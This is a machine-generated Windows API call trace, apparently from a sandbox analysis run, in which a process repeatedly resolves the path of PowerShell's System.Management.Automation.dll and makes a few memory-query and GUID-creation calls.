	[0402.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.010] VirtualQuery (in: lpAddress=0x26b380, lpBuffer=0x26c240, dwLength=0x30 | out: lpBuffer=0x26c240*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.011] VirtualQuery (in: lpAddress=0x26b410, lpBuffer=0x26c2d0, dwLength=0x30 | out: lpBuffer=0x26c2d0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.011] VirtualQuery (in: lpAddress=0x26b630, lpBuffer=0x26c4f0, dwLength=0x30 | out: lpBuffer=0x26c4f0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.012] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x28e4fb38, Data2=0x91d8, Data3=0x4c5a, Data4=([0]=0xba, [1]=0x50, [2]=0xd4, [3]=0x55, [4]=0xe3, [5]=0x4d, [6]=0xc4, [7]=0xd8))) returned 0x0
	[0402.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xcecf7dc0, Data2=0x378, Data3=0x4d98, Data4=([0]=0xa1, [1]=0x76, [2]=0x2b, [3]=0xa7, [4]=0xb9, [5]=0xcf, [6]=0x65, [7]=0x9b))) returned 0x0
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.014] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xbc161243, Data2=0x4d30, Data3=0x48d0, Data4=([0]=0xa3, [1]=0x23, [2]=0xd9, [3]=0xdc, [4]=0xd5, [5]=0x6, [6]=0xe3, [7]=0x78))) returned 0x0
	[0402.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.015] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x425a9371, Data2=0x89cb, Data3=0x4988, Data4=([0]=0x94, [1]=0xdc, [2]=0xd6, [3]=0xda, [4]=0x73, [5]=0x23, [6]=0x41, [7]=0x84))) returned 0x0
	[0402.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.016] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x7600f8ff, Data2=0x428b, Data3=0x4830, Data4=([0]=0xb8, [1]=0xb4, [2]=0xb0, [3]=0x70, [4]=0x1f, [5]=0x74, [6]=0xb0, [7]=0xa3))) returned 0x0
	[0402.016] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x4d9fd34e, Data2=0x4adc, Data3=0x4b5a, Data4=([0]=0x9a, [1]=0x66, [2]=0x3c, [3]=0xd6, [4]=0xee, [5]=0xe1, [6]=0x94, [7]=0x1b))) returned 0x0
	[0402.016] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0xa32a4ecc, Data2=0xa912, Data3=0x44a0, Data4=([0]=0x90, [1]=0xca, [2]=0x90, [3]=0x4d, [4]=0x7a, [5]=0x32, [6]=0xa3, [7]=0x94))) returned 0x0
	[0402.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.017] CoCreateGuid (in: pguid=0x26d370 | out: pguid=0x26d370*(Data1=0x1cbda847, Data2=0x1a5d, Data3=0x43ae, Data4=([0]=0xa6, [1]=0x40, [2]=0xea, [3]=0x5f, [4]=0x9c, [5]=0xd8, [6]=0x94, [7]=0xf))) returned 0x0
	[0402.017] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.017] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.018] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0402.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0402.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
